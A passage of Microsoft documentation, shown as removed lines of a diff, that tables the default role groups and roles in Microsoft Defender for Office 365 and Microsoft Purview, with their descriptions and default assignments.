-> In the Microsoft Defender XDR preview program, a different Microsoft Defender 365 RBAC model is also available. The permissions in this RBAC model are different from the Defender for Office 365 permissions as described in this article. For more information, see [Microsoft Defender XDR role-based access control (RBAC)](../defender/manage-rbac.md).
-
-## Role groups in Microsoft Defender for Office 365 and Microsoft Purview
-
-The table in this section lists the default role groups that are available in the Microsoft Defender portal and the Microsoft Purview portals, and the roles that are assigned to the role groups by default. To grant permissions to a user to perform tasks in Defender for Office 365 or Microsoft Purview, add them to the appropriate role group.
-
-Managing permissions in Defender for Office 365 or Microsoft Purview gives users access to security and compliance and governance features that are available within their respective portals. To grant permissions to other features, such as Exchange mail flow rules (also known as transport rules), you need to grant permissions in Exchange Online. For more information, see [Permissions in Exchange Online](/exchange/permissions-exo/permissions-exo).
-
-> [!NOTE]
-> To view the **Permissions** tab as described in this article, you need to be an admin. Specifically, you need to be assigned the **Role Management** role, and that role is assigned only to the **Organization Management** and **Purview Administrators** role groups by default. The **Role Management** role also allows you to view, create, and modify role groups.
-
-|Role group|Description|Default roles assigned|
-||||
-|**Attack Simulator Administrators**|Don't use this role group in these portals. Use the corresponding role in Microsoft Entra ID.|Attack Simulator Admin|
-|**Attack Simulator Payload Authors**|Don't use this role group in these portals. Use the corresponding role in Microsoft Entra ID.|Attack Simulator Payload Author|
-|**Audit Manager**|Manage Audit log settings and Search, View, and Export Audit logs.|Audit Logs <br/><br/> View-Only Audit Logs|
-|**Audit Reader**|Search, View, and Export Audit logs.|View-Only Audit Logs|
-|**Billing Administrator**|Configure Billing features.|Billing Admin|
-|**Communication Compliance**|Provides permission to all the communication compliance roles: administrator, analyst, investigator, and viewer.|Case Management <br/><br/> Communication Compliance Admin <br/><br/> Communication Compliance Analysis <br/><br/> Communication Compliance Case Management <br/><br/> Communication Compliance Investigation <br/><br/> Communication Compliance Viewer <br/><br/> Data Classification Feedback Provider <br/><br/> Data Connector Admin <br/><br/> Scope Manager <br/><br/> View-Only Case|
-|**Communication Compliance Administrators**|Administrators of communication compliance that can create/edit policies and define global settings.|Communication Compliance Admin <br/><br/> Communication Compliance Case Management <br/><br/> Data Connector Admin <br/><br/> Scope Manager|
-|**Communication Compliance Analysts**|Analysts of communication compliance that can investigate policy matches, view message meta data, and take remediation actions.|Communication Compliance Analysis <br/><br/> Communication Compliance Case Management|
-|**Communication Compliance Investigators**|Analysts of communication compliance that can investigate policy matches, view message content, and take remediation actions.|Case Management <br/><br/> Communication Compliance Analysis <br/><br/> Communication Compliance Case Management <br/><br/> Communication Compliance Investigation <br/><br/> Data Classification Feedback Provider <br/><br/> View-Only Case|
-|**Communication Compliance Viewers**|Viewer of communication compliance that can access the available reports and widgets.|Communication Compliance Case Management <br/><br/> Communication Compliance Viewer|
-|**Compliance Administrator**<sup>1</sup>|Members can manage settings for device management, data loss prevention, reports, and preservation.|Case Management <br/><br/> Communication Compliance Admin <br/><br/> Communication Compliance Case Management <br/><br/> Compliance Administrator <br/><br/> Compliance Manager Administration <br/><br/> Compliance Search <br/><br/> Credential Reader <br/><br/> Credential Writer <br/><br/> Data Classification Feedback Provider <br/><br/> Data Classification Feedback Reviewer <br/><br/> Data Connector Admin <br/><br/> Data Investigation Management <br/><br/> Data Map Reader <br/><br/> Device Management <br/><br/> Disposition Management <br/><br/> DLP Compliance Management <br/><br/> Hold <br/><br/> IB Compliance Management <br/><br/> Information Protection Admin <br/><br/> Information Protection Analyst <br/><br/> Information Protection Reader <br/><br/> Insider Risk Management Admin <br/><br/> Insights Reader <br/><br/> Manage Alerts <br/><br/> Organization Configuration <br/><br/> RecordManagement <br/><br/> Retention Management <br/><br/> Scan Reader <br/><br/> Scan Writer <br/><br/> Scope Manager <br/><br/> Source Reader <br/><br/> Source Writer <br/><br/> View-Only Audit Logs <br/><br/> View-Only Case <br/><br/> View-Only Device Management <br/><br/> View-Only DLP Compliance Management <br/><br/> View-Only IB Compliance Management <br/><br/> View-Only Manage Alerts <br/><br/> View-Only Recipients <br/><br/> View-Only Record Management <br/><br/> View-Only Retention Management|
-|**Compliance Data Administrator**|Members can manage settings for device management, data protection, data loss prevention, reports, and preservation.|Compliance Administrator <br/><br/> Compliance Manager Administration <br/><br/> Compliance Search <br/><br/> Device Management <br/><br/> Disposition Management <br/><br/> DLP Compliance Management <br/><br/> IB Compliance Management <br/><br/> Information Protection Admin <br/><br/> Information Protection Analyst <br/><br/> Information Protection Reader <br/><br/> Manage Alerts <br/><br/> Organization Configuration <br/><br/> RecordManagement <br/><br/> Retention Management <br/><br/> Scope Manager <br/><br/> Sensitivity Label Administrator <br/><br/> View-Only Audit Logs <br/><br/> View-Only Device Management <br/><br/> View-Only DLP Compliance Management <br/><br/> View-Only IB Compliance Management <br/><br/> View-Only Manage Alerts <br/><br/> View-Only Recipients <br/><br/> View-Only Record Management <br/><br/> View-Only Retention Management|
-|**Compliance Manager Administrators**|Manage template creation and modification.|Compliance Manager Administration <br/><br/> Compliance Manager Assessment <br/><br/> Compliance Manager Contribution <br/><br/> Compliance Manager Reader <br/><br/> Data Connector Admin|
-|**Compliance Manager Assessors**|Create assessments, implement improvement actions, and update test status for improvement actions.|Compliance Manager Assessment <br/><br/> Compliance Manager Contribution <br/><br/> Compliance Manager Reader <br/><br/> Data Connector Admin|
-|**Compliance Manager Contributors**|Create assessments and perform work to implement improvement actions.|Compliance Manager Contribution <br/><br/> Compliance Manager Reader <br/><br/> Data Connector Admin|
-|**Compliance Manager Readers**|View all Compliance Manager content except for administrator functions.|Compliance Manager Reader|
-|**Content Explorer Content Viewer**|View the contents files in Content explorer.|Data Classification Content Viewer|
-|**Content Explorer List Viewer**|View all items in Content explorer in list format only.|Data Classification List Viewer|
-|**Data Catalog Curators**|Perform create, read, modify, and delete actions on catalog data objects and establish relationships between objects.|Data Map Reader <br/><br/> Data Map Writer|
-|**Data Estate Insights Admins**|Provides admin access to all insights reports across platforms and providers.|Data Map Reader <br/><br/> Insights Reader <br/><br/> Insights Writer|
-|**Data Estate Insights Readers**|Provides read-only access to all insights reports across platforms and providers.|Data Map Reader <br/><br/> Insights Reader|
-|**Data Governance**|Grants access to data governance roles within Microsoft Purview.|Data Governance Administrator|
-|**Data Investigator**|Perform searches on mailboxes, SharePoint Online sites, and OneDrive for Business locations.|Communication <br/><br/> Compliance Search <br/><br/> Custodian <br/><br/> Data Investigation Management <br/><br/> Export <br/><br/> Preview <br/><br/> Review <br/><br/> RMS Decrypt <br/><br/> Search And Purge|
-|**Data Source Administrators**|Manage data sources and data scans.|Credential Reader <br/><br/> Credential Writer <br/><br/> Scan Reader <br/><br/> Scan Writer <br/><br/> Source Reader <br/><br/> Source Writer|
-|**eDiscovery Manager**|Members can perform searches and place holds on mailboxes, SharePoint Online sites, and OneDrive for Business locations. Members can also create and manage eDiscovery cases, add and remove members to a case, create and edit Content Searches associated with a case, and access case data in eDiscovery (Premium). <br/><br/> An eDiscovery Administrator is a member of the eDiscovery Manager role group who has been assigned additional permissions. In addition to the tasks that an eDiscovery Manager can perform, an eDiscovery Administrator can:<ul><li>View all eDiscovery cases in the organization.</li><li>Manage any eDiscovery case after they add themselves as a member of the case.</li></ul> <br/><br/> The primary difference between an eDiscovery Manager and an eDiscovery Administrator is that an eDiscovery Administrator can access all cases that are listed on the **eDiscovery cases** page in the compliance portal. An eDiscovery manager can only access the cases they created or cases they're a member of. For more information about making a user an eDiscovery Administrator, see [Assign eDiscovery permissions in the compliance portal](/purview/ediscovery-assign-permissions).|Case Management <br/><br/> Communication <br/><br/> Compliance Search <br/><br/> Custodian <br/><br/> Export <br/><br/> Hold <br/><br/> Manage Review Set Tags <br/><br/> Preview <br/><br/> Review <br/><br/> RMS Decrypt <br/><br/> Scope Manager|
-|**Exact Data Match Upload Admins**|Upload data for Exact Data Match.|Exact Data Match Upload Admin|
-|**Global Reader**|Members have read-only access to reports, alerts, and can see all the configuration and settings. <br/><br/> The primary difference between Global Reader and Security Reader is that a Global Reader can access **configuration and settings**.|Compliance Manager Reader <br/><br/> Security Reader <br/><br/> Sensitivity Label Reader <br/><br/> Service Assurance View <br/><br/> View-Only Audit Logs <br/><br/> View-Only Device Management <br/><br/> View-Only DLP Compliance Management <br/><br/> View-Only IB Compliance Management <br/><br/> View-Only Manage Alerts <br/><br/> View-Only Recipients <br/><br/> View-Only Record Management <br/><br/> View-Only Retention Management|
-|**Information Protection**|Full control over all information protection features, including sensitivity labels and their policies, DLP, all classifier types, activity and content explorers, and all related reports.|Data Classification Content Viewer <br/><br/> Data Classification List Viewer <br/><br/> Data Map Reader <br/><br/> Information Protection Admin <br/><br/> Information Protection Analyst <br/><br/> Information Protection Investigator <br/><br/> Information Protection Reader <br/><br/> Insights Reader <br/><br/> Purview Evaluation Administrator <br/><br/> Scan Reader <br/><br/> Source Reader|
-|**Information Protection Admins**|Create, edit, and delete DLP policies, sensitivity labels and their policies, and all classifier types. Manage endpoint DLP settings and simulation mode for auto-labeling policies.|Data Map Reader <br/><br/> Information Protection Admin <br/><br/> Insights Reader <br/><br/> Purview Evaluation Administrator <br/><br/> Scan Reader <br/><br/> Source Reader|
-|**Information Protection Analysts**|Access and manage DLP alerts and activity explorer. View-only access to DLP policies, sensitivity labels and their policies, and all classifier types.|Data Classification List Viewer <br/><br/> Data Map Reader <br/><br/> Information Protection Analyst <br/><br/> Insights Reader <br/><br/> Purview Evaluation Administrator|
-|**Information Protection Investigators**|Access and manage DLP alerts, activity explorer, and content explorer. View-only access to DLP policies, sensitivity labels and their policies, and all classifier types.|Data Classification Content Viewer <br/><br/> Data Classification List Viewer <br/><br/> Data Map Reader <br/><br/> Information Protection Analyst <br/><br/> Information Protection Investigator <br/><br/> Insights Reader <br/><br/> Purview Evaluation Administrator <br/><br/> Scan Reader <br/><br/> Source Reader|
-|**Information Protection Readers**|View-only access to reports for DLP policies and sensitivity labels and their policies.|Information Protection Reader|
-|**Insider Risk Management**|Use this role group to manage insider risk management for your organization in a single group. By adding all user accounts for designated administrators, analysts, and investigators, you can configure insider risk management permissions in a single group. This role group contains all the insider risk management permission roles. This role group is the easiest way to quickly get started with insider risk management and is a good fit for organizations that don't need separate permissions defined for separate groups of users.|Case Management <br/><br/> Custodian <br/><br/> Data Connector Admin <br/><br/> Insider Risk Management Admin <br/><br/> Insider Risk Management Analysis <br/><br/> Insider Risk Management Approval <br/><br/> Insider Risk Management Audit <br/><br/> Insider Risk Management Investigation <br/><br/> Insider Risk Management Sessions <br/><br/> Review <br/><br/> View-Only Case|
-|**Insider Risk Management Admins**|Use this role group to initially configure insider risk management and later to segregate insider risk administrators into a defined group. Users in this role group can create, read, update, and delete insider risk management policies, global settings, and role group assignments.|Case Management <br/><br/> Data Connector Admin <br/><br/> Insider Risk Management Admin <br/><br/> View-Only Case|
-|**Insider Risk Management Analysts**|Use this group to assign permissions to users that act as insider risk case analysts. Users in this role group can access all insider risk management alerts, cases, and notices templates. They can't access the insider risk Content Explorer.|Case Management <br/><br/> Insider Risk Management Analysis <br/><br/> View-Only Case|
-|**Insider Risk Management Approvers**|For internal approval use only.|Insider Risk Management Approval|
-|**Insider Risk Management Auditors**|Use this group to assign permissions to users that audit insider risk management activities. Users in this role group can access the insider risk audit log.|Insider Risk Management Audit|
-|**Insider Risk Management Investigators**|Use this group to assign permissions to users that act as insider risk data investigators. Users in this role group can access all insider risk management alerts, cases, notices templates, and the Content Explorer for all cases.|Case Management <br/><br/> Custodian <br/><br/> Insider Risk Management Investigation <br/><br/> Review <br/><br/> View-Only Case|
-|**Insider Risk Management Session Approvers**|For internal approval use only.|Insider Risk Management Sessions|
-|**IRM Contributors**|This role group is visible, but is used by background services only.|Insider Risk Management Permanent contribution <br/><br/> Insider Risk Management Temporary contribution|
-|**Knowledge Administrators**|Configure knowledge, learning, assign trainings and other intelligent features.|Knowledge Admin|
-|**MailFlow Administrator**|Members can monitor and view mail flow insights and reports in the Defender portal. Global admins can add ordinary users to this group, but, if the user isn't a member of the Exchange Admin group, the user doesn't have access to Exchange admin-related tasks.|Exchange Administrator <br/><br/> View-Only Recipients|
-|**Organization Management**<sup>1</sup>|Members can control permissions for accessing features in these portals, and also manage settings for device management, data loss prevention, reports, and preservation. <br/><br/> Users who aren't global administrators must be Exchange administrators to see and take action on devices that are managed by Basic Mobility and Security for Microsoft 365 (formerly known as Mobile Device Management or MDM). <br/><br/> Global admins are automatically added as members of this role group, but you don't see them in the output of the [Get-RoleGroupMember](/powershell/module/exchange/get-rolegroupmember) cmdlet in [Security & Compliance PowerShell](/powershell/module/exchange/get-rolegroupmember).|Audit Logs <br/><br/> Case Management <br/><br/> Communication Compliance Admin <br/><br/> Communication Compliance Case Management <br/><br/> Compliance Administrator <br/><br/> Compliance Manager Administration <br/><br/> Compliance Search <br/><br/> Data Connector Admin <br/><br/> Device Management <br/><br/> DLP Compliance Management <br/><br/> Hold <br/><br/> IB Compliance Management <br/><br/> Insider Risk Management Admin <br/><br/> Manage Alerts <br/><br/> Organization Configuration <br/><br/> Quarantine <br/><br/> RecordManagement <br/><br/> Retention Management <br/><br/> Role Management <br/><br/> Scope Manager <br/><br/> Search And Purge <br/><br/> Security Administrator <br/><br/> Security Reader <br/><br/> Sensitivity Label Administrator <br/><br/> Sensitivity Label Reader <br/><br/> Service Assurance View <br/><br/> Tag Contributor <br/><br/> Tag Manager <br/><br/> Tag Reader <br/><br/> View-Only Audit Logs <br/><br/> View-Only Case <br/><br/> View-Only Device Management <br/><br/> View-Only DLP Compliance Management <br/><br/> View-Only IB Compliance Management <br/><br/> View-Only Manage Alerts <br/><br/> View-Only Recipients <br/><br/> View-Only Record Management <br/><br/> View-Only Retention Management|
-|**Privacy Management**|Manage access control for Privacy Management solution in the Microsoft Purview compliance portal.|Case Management <br/><br/> Compliance Manager Contribution <br/><br/> Compliance Manager Reader <br/><br/> Data Classification Content Viewer <br/><br/> Data Classification List Viewer <br/><br/> Privacy Management Admin <br/><br/> Privacy Management Analysis <br/><br/> Privacy Management Investigation <br/><br/> Privacy Management Permanent contribution <br/><br/> Privacy Management Temporary contribution <br/><br/> Privacy Management Viewer <br/><br/> Subject Rights Request Admin <br/><br/> View-Only Case|
-|**Privacy Management Administrators**|Administrators of privacy management solution that can create/edit policies and define global settings.|Case Management <br/><br/> Compliance Manager Contribution <br/><br/> Compliance Manager Reader <br/><br/> Privacy Management Admin <br/><br/> View-Only Case|
-|**Privacy Management Analysts**|Analysts of privacy management solution that can investigate policy matches, view messages meta data, and take remediation actions.|Case Management <br/><br/> Compliance Manager Reader <br/><br/> Data Classification List Viewer <br/><br/> Privacy Management Analysis <br/><br/> View-Only Case|
-|**Privacy Management Contributors**|Manage contributor access for privacy management cases.|Compliance Manager Reader <br/><br/> Privacy Management Permanent contribution <br/><br/> Privacy Management Temporary contribution|
-|**Privacy Management Investigators**|Investigators of privacy management solution that can investigate policy matches, view message content, and take remediation actions.|Case Management <br/><br/> Compliance Manager Reader <br/><br/> Data Classification Content Viewer <br/><br/> Data Classification List Viewer <br/><br/> Privacy Management Investigation <br/><br/> View-Only Case|
-|**Privacy Management Viewers**|Viewer of privacy management solution that can access the available dashboards and widgets.|Compliance Manager Reader <br/><br/> Data Classification List Viewer <br/><br/> Privacy Management Viewer|
-|**Purview Administrators**|Create, edit, and delete domains and perform role assignments.|Purview Domain Manager <br/><br/> Role Management|
-|**Quarantine Administrator**|Members can access all Quarantine actions. For more information, see [Manage quarantined messages and files as an admin in EOP](quarantine-admin-manage-messages-files.md)|Quarantine|
-|**Records Management**|Members can configure all aspects of records management, including retention labels and disposition reviews.|Disposition Management <br/><br/> RecordManagement <br/><br/> Retention Management <br/><br/> Scope Manager|
-|**Reviewer**|Members can access review sets in [eDiscovery (Premium)](/purview/ediscovery-overview) cases. Members of this role group can see and open the list of cases on the **eDiscovery \> Advanced** page in the Microsoft Purview compliance portal that they're members of. After the user accesses an eDiscovery (Premium) case, they can select **Review sets** to access case data. This role doesn't allow the user to preview the results of a collection search that's associated with the case or do other search or case management tasks. Members of this role group can only access the data in a review set.|Review|
-|**Security Administrator**|Members have access to many security features of Identity Protection Center, Privileged Identity Management, Monitor Microsoft 365 Service Health, and the Defender and compliance portals. <br/><br/> By default, this role group may not appear to have any members. However, the Security Administrator role from Microsoft Entra ID is assigned to this role group. Therefore, this role group inherits the capabilities and membership of the Security Administrator role from Microsoft Entra ID. <br/><br/> To manage permissions centrally, add and remove group members in the Microsoft Entra admin center. For more information, see [Microsoft Entra built-in roles](/entra/identity/role-based-access-control/permissions-reference). If you edit this role group in these portals (membership or roles), those changes apply only to the security and compliance areas and not to any other services. <br/><br/> This role group includes all of the read-only permissions of the Security reader role, plus many additional administrative permissions for the same
-|**Security Operator**|Members can manage security alerts, and also view reports and settings of security features.|Compliance Search <br/><br/> Manage Alerts <br/><br/> Security Reader <br/><br/> Tag Contributor <br/><br/> Tag Reader <br/><br/> Tenant AllowBlockList Manager <br/><br/> View-Only Audit Logs <br/><br/> View-Only Device Management <br/><br/> View-Only DLP Compliance Management <br/><br/> View-Only IB Compliance Management <br/><br/> View-Only Manage Alerts|
-|**Security Reader**|Members have read-only access to many security features of Identity Protection Center, Privileged Identity Management, Monitor Microsoft 365 Service Health, and the Defender and compliance portals. <br/><br/> By default, this role group may not appear to have any members. However, the Security Reader role from Microsoft Entra ID is assigned to this role group. Therefore, this role group inherits the capabilities and membership of the Security Reader role from Microsoft Entra ID. <br/><br/> To manage permissions centrally, add and remove group members in the Microsoft Entra admin center. For more information, see [Microsoft Entra built-in roles](/entra/identity/role-based-access-control/permissions-reference). If you edit this role group in the portals (membership or roles), those changes apply only to security and compliance areas and not to any other services.|Compliance Manager Reader <br/><br/> Security Reader <br/><br/> Sensitivity Label Reader <br/><br/> Tag Reader <br/><br/> View-Only Device Management <br/><br/> View-Only DLP Compliance Management <br/><br/> View-Only IB Compliance Management <br/><br/> View-Only Manage Alerts|
-|**Service Assurance User**|Members can access the Service assurance section in the compliance portal. Service assurance provides reports and documents that describe Microsoft's security practices for customer data that's stored in Microsoft 365. It also provides independent third-party audit reports on Microsoft 365. For more information, see [Service assurance in the compliance portal](/purview/service-assurance).|Service Assurance View|
-|**Subject Rights Request Administrators**|Create subject rights requests.|Case Management <br/><br/> Compliance Manager Contribution <br/><br/> Compliance Manager Reader <br/><br/> Subject Rights Request Admin <br/><br/> View-Only Case|
-|**Subject Rights Request Approvers**|Approvers who are able to approve subject rights requests.|Compliance Manager Reader <br/><br/> Subject Rights Request Approver|
-|**Supervisory Review**|Members can create and manage the policies that define which communications are subject to review in an organization. For more information, see [Configure communication compliance policies for your organization](/purview/communication-compliance-configure).|Supervisory Review Administrator|
-
-> [!NOTE]
-> <sup>1</sup> This role group doesn't assign members the permissions necessary to search the audit log or to use any reports that might include Exchange data, such as the DLP or Defender for Office 365 reports. To search the audit log or to view all reports, a user has to be assigned permissions in Exchange Online. This action is required because the underlying cmdlet that's used to search the audit log is an Exchange Online cmdlet. Global admins can search the audit log and view all reports because they're automatically added as members of the Organization Management role group in Exchange Online. For more information, see [Search the audit log in the compliance portal](/purview/audit-log-search).
-
-## Roles in Microsoft Defender for Office 365 and Microsoft Purview
-
-The table in this section lists the available roles and the role groups that they're assigned to by default.
-
-Roles that aren't assigned to the Organization Management role group by default are marked with <sup>\*</sup>
-
-|Role|Description|Default role group assignments|
-||||
-|**Attack Simulator Admin**<sup>\*</sup>|Don't use this role in the portals. Use the corresponding role in Microsoft Entra ID.|Attack Simulator Administrators|
-|**Attack Simulator Payload Author**<sup>\*</sup>|Don't use this role in the portals. Use the corresponding role in Microsoft Entra ID.|Attack Simulator Payload Authors|
-|**Audit Logs**|Turn on and configure auditing for the organization, view the organization's audit reports, and then export these reports to a file.|Audit Manager <br/><br/> Organization Management <br/><br/> Security Administrator|
-|**Billing Admin**<sup>\*</sup>|Allows billing admin for selected feature.|Billing Administrator|
-|**Case Management**|Create, edit, delete, and control access to eDiscovery cases.|Communication Compliance <br/><br/> Communication Compliance Investigators <br/><br/> Compliance Administrator <br/><br/> eDiscovery Manager <br/><br/> Insider Risk Management <br/><br/> Insider Risk Management Admins <br/><br/> Insider Risk Management Analysts <br/><br/> Insider Risk Management Investigators <br/><br/> Organization Management <br/><br/> Privacy Management <br/><br/> Privacy Management Administrators <br/><br/> Privacy Management Analysts <br/><br/> Privacy Management Investigators <br/><br/> Subject Rights Request Administrators|
-|**Communication**<sup>\*</sup>|Manage all communications with the custodians identified in an eDiscovery (Premium) case. Create hold notifications, hold reminders, and escalations to management. Track custodian acknowledgment of hold notifications and manage access to the custodian portal that's used by each custodian in a case to track communications for the cases where they were identified as a custodian.|Data Investigator <br/><br/> eDiscovery Manager|
-|**Communication Compliance Admin**|Used to manage policies in the Communication Compliance feature.|Communication Compliance <br/><br/> Communication Compliance Administrators <br/><br/> Compliance Administrator <br/><br/> Organization Management|
-|**Communication Compliance Analysis**<sup>\*</sup>|Used to perform investigation, remediation of the message violations in the Communication Compliance feature. Can only view message meta data.|Communication Compliance <br/><br/> Communication Compliance Analysts <br/><br/> Communication Compliance Investigators|
-|**Communication Compliance Case Management**|Used to access Communication Compliance cases.|Communication Compliance <br/><br/> Communication Compliance Administrators <br/><br/> Communication Compliance Analysts <br/><br/> Communication Compliance Investigators <br/><br/> Communication Compliance Viewers <br/><br/> Compliance Administrator <br/><br/> Organization Management|
-|**Communication Compliance Investigation**<sup>\*</sup>|Used to perform investigation, remediation, and review message violations in the Communication Compliance feature. Can view message meta data and message.|Communication Compliance <br/><br/> Communication Compliance Investigators|
-|**Communication Compliance Viewer**<sup>\*</sup>|Used to access reports and widgets in the Communication Compliance feature.|Communication Compliance <br/><br/> Communication Compliance Viewers|
-|**Compliance Administrator**|View and edit settings and reports for compliance features.|Compliance Administrator <br/><br/> Compliance Data Administrator <br/><br/> Organization Management|
-|**Compliance Manager Administration**|Manage template creation and modification.|Compliance Administrator <br/><br/> Compliance Data Administrator <br/><br/> Compliance Manager Administrators <br/><br/> Organization Management <br/><br/> Security Administrator|
-|**Compliance Manager Assessment**<sup>\*</sup>|Create assessments, implement improvement actions, and update test status for improvement actions.|Compliance Manager Administrators <br/><br/> Compliance Manager Assessors|
-|**Compliance Manager Contribution**<sup>\*</sup>|Create assessments and perform work to implement improvement actions.|Compliance Manager Administrators <br/><br/> Compliance Manager Assessors <br/><br/> Compliance Manager Contributors <br/><br/> Privacy Management <br/><br/> Privacy Management Administrators <br/><br/> Subject Rights Request Administrators|
-|**Compliance Manager Reader**<sup>\*</sup>|View all Compliance Manager content except for administrator functions.|Compliance Manager Administrators <br/><br/> Compliance Manager Assessors <br/><br/> Compliance Manager Contributors <br/><br/> Compliance Manager Readers <br/><br/> Global Reader <br/><br/> Privacy Management <br/><br/> Privacy Management Administrators <br/><br/> Privacy Management Analysts <br/><br/> Privacy Management Contributors <br/><br/> Privacy Management Investigators <br/><br/> Privacy Management Viewers <br/><br/> Security Reader <br/><br/> Subject Rights Request Administrators <br/><br/> Subject Rights Request Approvers|
-|**Compliance Search**|Perform searches across mailboxes and get an estimate of the results.|Compliance Administrator <br/><br/> Compliance Data Administrator <br/><br/> Data Investigator <br/><br/> eDiscovery Manager <br/><br/> Organization Management <br/><br/> Security Operator|
-|**Credential Reader**<sup>\*</sup>|Read the different credentials created in the tenant.|Compliance Administrator <br/><br/> Data Source Administrators|
-|**Credential Writer**<sup>\*</sup>|Create and edit credentials.|Compliance Administrator <br/><br/> Data Source Administrators|
-|**Custodian**<sup>\*</sup>|Identify and manage custodians for eDiscovery (Premium) cases and use the information from Microsoft Entra ID and other sources to find data sources associated with custodians. Associate other data sources such as mailboxes, SharePoint sites, and Teams with custodians in a case. Place a legal hold on the data sources associated with custodians to preserve content in the context of a case.|Data Investigator <br/><br/> eDiscovery Manager <br/><br/> Insider Risk Management <br/><br/> Insider Risk Management Investigators|
-|**Data Classification Content Viewer**<sup>\*</sup>|View in-place rendering of files in Content explorer.|Content Explorer Content Viewer <br/><br/> Information Protection <br/><br/> Information Protection Investigators <br/><br/> Privacy Management <br/><br/> Privacy Management Investigators|
-|**Data Classification Feedback Provider**<sup>\*</sup>|Allows providing feedback to classifiers in content explorer.|Communication Compliance <br/><br/> Communication Compliance Investigators <br/><br/> Compliance Administrator|
-|**Data Classification Feedback Reviewer**<sup>\*</sup>|Allows reviewing feedback from classifiers in feedback explorer.|Compliance Administrator|
-|**Data Classification List Viewer**<sup>\*</sup>|View the list of files in content explorer.|Content Explorer List Viewer <br/><br/> Information Protection <br/><br/> Information Protection Analysts <br/><br/> Information Protection Investigators <br/><br/> Privacy Management <br/><br/> Privacy Management Analysts <br/><br/> Privacy Management Investigators <br/><br/> Privacy Management Viewers|
-|**Data Connector Admin**|Create and manage connectors to import and archive non-Microsoft data in Microsoft 365.|Communication Compliance <br/><br/> Communication Compliance Administrators <br/><br/> Compliance Administrator <br/><br/> Compliance Manager Administrators <br/><br/> Compliance Manager Assessors <br/><br/> Compliance Manager Contributors <br/><br/> Insider Risk Management <br/><br/> Insider Risk Management Admins <br/><br/> Organization Management|
-|**Data Governance Administrator**|Delegates the first level of access for business domain creators and other application-level permissions.|Data Governance|
-|**Data Investigation Management**<sup>\*</sup>|Create, edit, delete, and control access to data investigation.|Compliance Administrator <br/><br/> Data Investigator|
-|**Data Map Reader**<sup>\*</sup>|Read actions on data map objects.|Compliance Administrator <br/><br/> Data Catalog Curators <br/><br/> Estate Insights Admins <br/><br/> Data Estate Insights Readers <br/><br/> Information Protection <br/><br/> Information Protection Admins <br/><br/> Information Protection Analysts <br/><br/> Information Protection Investigators|
-|**Data Map Writer**<sup>\*</sup>|Create, read, modify, and delete actions on data map objects and establish relationships between objects.|Data Catalog Curators|
-|**Device Management**|View and edit settings and reports for device management features.|Compliance Administrator <br/><br/> Compliance Data Administrator <br/><br/> Organization Management <br/><br/> Security Administrator|
-|**Disposition Management**<sup>\*</sup>|Control permissions for accessing Manual Disposition in the Defender and compliance portals.|Compliance Administrator <br/><br/> Compliance Data Administrator <br/><br/> Records Management|
-|**DLP Compliance Management**|View and edit settings and reports for data loss prevention (DLP) policies.|Compliance Administrator <br/><br/> Compliance Data Administrator <br/><br/> Organization Management <br/><br/> Security Administrator|
-|**Exact Data Match Upload Admin**|Lets users upload data for Exact Data Match.|Exact Data Match Upload Admins|
-|**Exchange Administrator**|Allows Exchange administrator for selected features.|MailFlow Administrator|
-|**Export**<sup>\*</sup>|Export mailbox and site content that's returned from searches.|Data Investigator <br/><br/> eDiscovery Manager|
-|**Hold**|Place content in mailboxes, sites, and public folders on hold. When on hold, a copy of the content is stored in a secure location. Content owners are still able to modify or delete the original content.|Compliance Administrator <br/><br/> eDiscovery Manager <br/><br/> Organization Management|
-|**IB Compliance Management**|View, create, remove, modify, and test Information Barrier policies.|Compliance Administrator <br/><br/> Compliance Data Administrator <br/><br/> Organization Management <br/><br/> Security Administrator|
-|**Information Protection Admin**<sup>\*</sup>|Create, edit, and delete DLP policies, sensitivity labels and their policies, and all classifier types. Manage endpoint DLP settings and simulation mode for auto-labeling policies.|Compliance Administrator <br/><br/> Compliance Data Administrator <br/><br/> Information Protection <br/><br/> Information Protection Admins|
-|**Information Protection Analyst**<sup>\*</sup>|Access and manage DLP alerts and activity explorer. View-only access to DLP policies, sensitivity labels and their policies, and all classifier types.|Compliance Administrator <br/><br/> Compliance Data Administrator <br/><br/> Information Protection <br/><br/> Information Protection Analysts <br/><br/> Information Protection Investigators|
-|**Information Protection Investigator**<sup>\*</sup>|Access and manage DLP alerts, activity explorer, and content explorer. View-only access to DLP policies, sensitivity labels and their policies, and all classifier types.|Information Protection <br/><br/> Information Protection Investigators|
-|**Information Protection Reader**<sup>\*</sup>|View-only access to reports for DLP policies and sensitivity labels and their policies.|Compliance Administrator <br/><br/> Compliance Data Administrator <br/><br/> Information Protection <br/><br/> Information Protection Readers|
-|**Insider Risk Management Admin**|Create, edit, delete, and control access to Insider Risk Management feature.|Compliance Administrator <br/><br/> Insider Risk Management <br/><br/> Insider Risk Management Admins <br/><br/> Organization Management|
-|**Insider Risk Management Analysis**<sup>\*</sup>|Access all insider risk management alerts, cases, and notices templates.|Insider Risk Management <br/><br/> Insider Risk Management Analysts|
-|**Insider Risk Management Approval**<sup>\*</sup>|Perform investigation, remediation, and review message violations in Privacy Management solution. Can view message metadata and full messages.|Insider Risk Management <br/><br/> Insider Risk Management Approvers|
-|**Insider Risk Management Audit**<sup>\*</sup>|Allow viewing Insider Risk audit trails.|Insider Risk Management <br/><br/> Insider Risk Management Auditors|
-|**Insider Risk Management Investigation**<sup>\*</sup>|Access all insider risk management alerts, cases, notices templates, and the Content Explorer for all cases.|Insider Risk Management <br/><br/> Insider Risk Management Investigators|
-|**Insider Risk Management Permanent contribution**<sup>\*</sup>|This role group is visible, but is used by background services only.|IRM Contributors|
-|**Insider Risk Management Sessions**<sup>\*</sup>|Perform investigation and remediation of message violations in Privacy Management solution. Can view only message metadata.|Insider Risk Management <br/><br/> Insider Risk Management Session Approvers|
-|**Insider Risk Management Temporary contribution**<sup>\*</sup>|This role group is visible, but is used by background services only.|IRM Contributors|
-|**Insights Reader**<sup>\*</sup>|Provides read-only access to all Insights reports in the Data Estate Insights app. Insights readers need to have at least data reader role access to a collection to view reports about that specific collection.|Compliance Administrator <br/><br/> Data Estate Insights Admins <br/><br/> Data Estate Insights Readers <br/><br/> Information Protection <br/><br/> Information Protection Admins <br/><br/> Information Protection Analysts <br/><br/> Information Protection Investigators|
-|**Insights Writer**||Data Estate Insights Admins|
-|**Knowledge Admin**<sup>\*</sup>|Configure knowledge, learning, assign trainings and other intelligent features.|Knowledge Administrators|
